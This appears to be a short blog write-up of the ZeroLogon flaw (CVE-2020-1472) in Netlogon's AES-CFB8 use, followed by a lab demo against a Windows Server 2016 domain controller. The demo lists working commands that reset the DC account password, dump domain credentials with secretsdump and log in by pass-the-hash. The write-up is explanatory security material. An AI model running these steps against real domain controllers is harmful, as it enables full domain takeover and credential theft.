ZeroLogon Exploit
CVE-2020-1472, 6 Oct 2020
Introduction
CVE-2020-1472, a privilege elevation vulnerability in the Netlogon Remote Protocol (MS-NRPC) which Microsoft released a patch (KB4565349) fixed in August 2020. This vulnerability was discovered by secure security researcher Tom Tervoor on 11 September 2020. A weakness point was found on the encryption Advanced Encryption Standard – Cipher Feed Back 8 bit , (AES-CFB8) that used at the MS-NRPC to encrypt the client credential with the "Client Challenge" during the third steps of MS-NRPC. ZeroLogon, affected all the windows servers that function as Active Directory domain controllers in enterprise networks.
The following diagram is the authentication handshake process of MS-NRPC, the attack happened on steps 3 on encrypting the client credential using the AES-CFB8.
Using the AES-CFB8 in MS-NRPC protocol has an issue with the Initialisation Vector (IV). The IV should be a random number, but MS-NRPC set a fixed IV of 16 bytes of zeros. Thus, if the client challenge set to all zeros, the probability of all zero encryption result is 1/256. It can easy to pass the step 4 validation. The attack details can be referenced to the Whitepaper by Tom Tervoor
Exploitation Demo
Many PoC exploits have been released (1, 2, 3, 4, 5, ... etc)
Target Environment
Host Name: FKCLAI-WIN2016 OS Name: Microsoft Windows Server 2016 Standard OS Version: 10.0.14393 N/A Build 14393 Domain: FKCLAI.local Logon Server: \\FKCLAI-WIN2016
Tools Setup
Using the RiskSense's ZeroLogon exploitation script with the latest updated of the impacket on this demo.
Remove all impacket scripts
get the latest impacket from the https://github.com/SecureAuthCorp/impacket.git
Start Exploit
python3 set_empty_pw.py fkclai-win2016 192.168.1.169
secretsdump.py -just-dc administrator/fkclai-win2016\$@192.168.1.169
wmiexec.py fkclai/administrator@192.168.1.169 -hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
mimikatz Coding
Last updated